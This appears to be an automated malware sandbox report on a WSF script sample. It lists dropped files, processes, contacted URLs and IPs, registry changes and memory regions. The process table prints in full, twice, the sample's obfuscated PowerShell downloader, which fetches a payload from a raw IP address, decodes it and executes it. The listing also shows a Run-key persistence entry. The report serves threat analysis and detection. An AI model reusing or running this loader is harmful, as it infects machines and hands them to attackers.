Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
CDS AC 661171855-VN1 SOA.wsf
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\424iy8O9X8
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35uudlsa.c4o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehedxga5.unh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpz1ed51.d51.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ue42xeym.f33.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Thermoswitch172.Med
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function
unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser;
$Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){.
($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4
;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike
'.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs
iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS-
CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable
(unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes =
unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike
'.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike
' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable
(unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable
(unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike
'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable
(unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while
(!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable
(unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e
sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+
+R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo
bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike
'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a
tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS.
EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u
s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function
unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser;
$Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){.
($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4
;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike
'.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs
iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS-
CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable
(unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes =
unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike
'.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike
' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable
(unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable
(unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike
'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable
(unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while
(!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable
(unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e
sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+
+R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo
bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike
'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a
tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS.
EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u
s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
|
"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
"C:\Windows\SysWOW64\recover.exe"
|
|
|
|
C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
|
"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://87.121.105.163/AKaUDBTG140.binb
|
unknown
|
||
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.163/domkapitler.msi
|
87.121.105.163
|
||
|
http://87.121.105.163/domkapitler.msiP
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://www.jackcliu.com/u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX
|
45.194.181.142
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
http://www.smartfindsdepot.shop/u88q/
|
23.82.11.73
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://87.121.105.163/domkapitler.msiXR
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://87.121.105.163//
|
unknown
|
||
|
http://87.121.105.163/AKaUDBTG140.bin
|
87.121.105.163
|
||
|
http://87.121.105.163/AKaUDBTG140.bin~OU
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://87.121.105.163/AKaUDBTG140.bin/
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g=
|
23.82.11.73
|
||
|
http://crl.microv
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
http://www.smartfindsdepot.shop
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.barpa.be
|
unknown
|
|
|
|
www.smartfindsdepot.shop
|
23.82.11.73
|
||
|
barpa.be
|
192.185.96.244
|
||
|
www.jackcliu.com
|
45.194.181.142
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.194.181.142
|
www.jackcliu.com
|
Seychelles
|
||
|
192.185.96.244
|
barpa.be
|
United States
|
||
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
23.82.11.73
|
www.smartfindsdepot.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
T61TH2R0
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2432CDEC000
|
trusted library allocation
|
page read and write
|
|
|
|
BD0000
|
system
|
page execute and read and write
|
|
|
|
580F000
|
trusted library allocation
|
page read and write
|
|
|
|
3210000
|
trusted library allocation
|
page read and write
|
|
|
|
2CF0000
|
system
|
page execute and read and write
|
|
|
|
31D0000
|
trusted library allocation
|
page read and write
|
|
|
|
214C0000
|
unclassified section
|
page execute and read and write
|
|
|
|
9FC7000
|
direct allocation
|
page execute and read and write
|
|
|
|
3B80000
|
unkown
|
page execute and read and write
|
|
|
|
8600000
|
direct allocation
|
page execute and read and write
|
|
|
|
56E4000
|
trusted library allocation
|
page read and write
|
||
|
7C16000
|
heap
|
page read and write
|
||
|
5681000
|
trusted library allocation
|
page read and write
|
||
|
2431CFA4000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
heap
|
page execute and read and write
|
||
|
7BEA000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431B2FC000
|
heap
|
page read and write
|
||
|
3000000
|
remote allocation
|
page execute and read and write
|
||
|
190000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
16B0000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
19E000
|
unkown
|
page readonly
|
||
|
1B70FFD9000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
243354FD000
|
heap
|
page read and write
|
||
|
59A000
|
stack
|
page read and write
|
||
|
1B710042000
|
heap
|
page read and write
|
||
|
1B710011000
|
heap
|
page read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
4345000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
75CB000
|
stack
|
page read and write
|
||
|
4364000
|
heap
|
page read and write
|
||
|
1B710028000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
1B70E355000
|
heap
|
page read and write
|
||
|
191000
|
unkown
|
page execute read
|
||
|
8390000
|
heap
|
page read and write
|
||
|
71D5000
|
heap
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
2431B2C5000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
2470000
|
unkown
|
page read and write
|
||
|
2D9E000
|
stack
|
page read and write
|
||
|
1B70E283000
|
heap
|
page read and write
|
||
|
24335360000
|
heap
|
page read and write
|
||
|
46E15FE000
|
stack
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
1FD70000
|
direct allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1A7000
|
unkown
|
page readonly
|
||
|
46E16FE000
|
stack
|
page read and write
|
||
|
20ADD6C0000
|
heap
|
page read and write
|
||
|
426E000
|
stack
|
page read and write
|
||
|
7C9A000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2DB9000
|
heap
|
page read and write
|
||
|
1B70E1B8000
|
heap
|
page read and write
|
||
|
1F2E0000
|
direct allocation
|
page read and write
|
||
|
268F000
|
stack
|
page read and write
|
||
|
64C000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
6C5E000
|
stack
|
page read and write
|
||
|
1B710011000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
1B71001A000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
1F2F0000
|
direct allocation
|
page read and write
|
||
|
1B70E264000
|
heap
|
page read and write
|
||
|
2DBE000
|
stack
|
page read and write
|
||
|
7C4F000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
3440000
|
direct allocation
|
page execute and read and write
|
||
|
2431CC50000
|
trusted library allocation
|
page read and write
|
||
|
1B70E23C000
|
heap
|
page read and write
|
||
|
528F000
|
stack
|
page read and write
|
||
|
2431EDC4000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
27105B00000
|
trusted library allocation
|
page read and write
|
||
|
8377000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431CC80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347AB000
|
trusted library allocation
|
page read and write
|
||
|
1F6D70E4000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2433530F000
|
heap
|
page read and write
|
||
|
749D000
|
stack
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
31BF000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F88F000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710051000
|
heap
|
page read and write
|
||
|
35DE000
|
direct allocation
|
page execute and read and write
|
||
|
243354D8000
|
heap
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
1B70FFD9000
|
heap
|
page read and write
|
||
|
1FE9D000
|
direct allocation
|
page execute and read and write
|
||
|
2432D075000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3484C000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2E42000
|
unkown
|
page read and write
|
||
|
1A5000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
1B70E357000
|
heap
|
page read and write
|
||
|
328C000
|
heap
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E282000
|
heap
|
page read and write
|
||
|
1B70E35E000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710089000
|
heap
|
page read and write
|
||
|
1228000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E35E000
|
heap
|
page read and write
|
||
|
C49000
|
stack
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
46E264D000
|
stack
|
page read and write
|
||
|
4E3D000
|
stack
|
page read and write
|
||
|
271040F0000
|
heap
|
page read and write
|
||
|
CD0000
|
unkown
|
page readonly
|
||
|
2431D3A1000
|
trusted library allocation
|
page read and write
|
||
|
1061000
|
unkown
|
page readonly
|
||
|
2432CD90000
|
trusted library allocation
|
page read and write
|
||
|
305C000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
1B710099000
|
heap
|
page read and write
|
||
|
A60000
|
unkown
|
page readonly
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
8186000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
3F8C000
|
system
|
page read and write
|
||
|
2FEDDFE000
|
stack
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E260000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
A60000
|
unkown
|
page readonly
|
||
|
1F6D6D80000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
315E000
|
unkown
|
page read and write
|
||
|
1B70E1B0000
|
heap
|
page read and write
|
||
|
271058C0000
|
heap
|
page read and write
|
||
|
27105C0F000
|
trusted library allocation
|
page read and write
|
||
|
11B0000
|
unkown
|
page read and write
|
||
|
124E000
|
heap
|
page read and write
|
||
|
2431EDDF000
|
trusted library allocation
|
page read and write
|
||
|
24335240000
|
heap
|
page execute and read and write
|
||
|
7C3B000
|
heap
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
4A8E000
|
stack
|
page read and write
|
||
|
2431B3B0000
|
heap
|
page read and write
|
||
|
271040DA000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
7C4D000
|
heap
|
page read and write
|
||
|
56A9000
|
trusted library allocation
|
page read and write
|
||
|
1B710054000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B71002D000
|
heap
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
2C25000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
|
28E7000
|
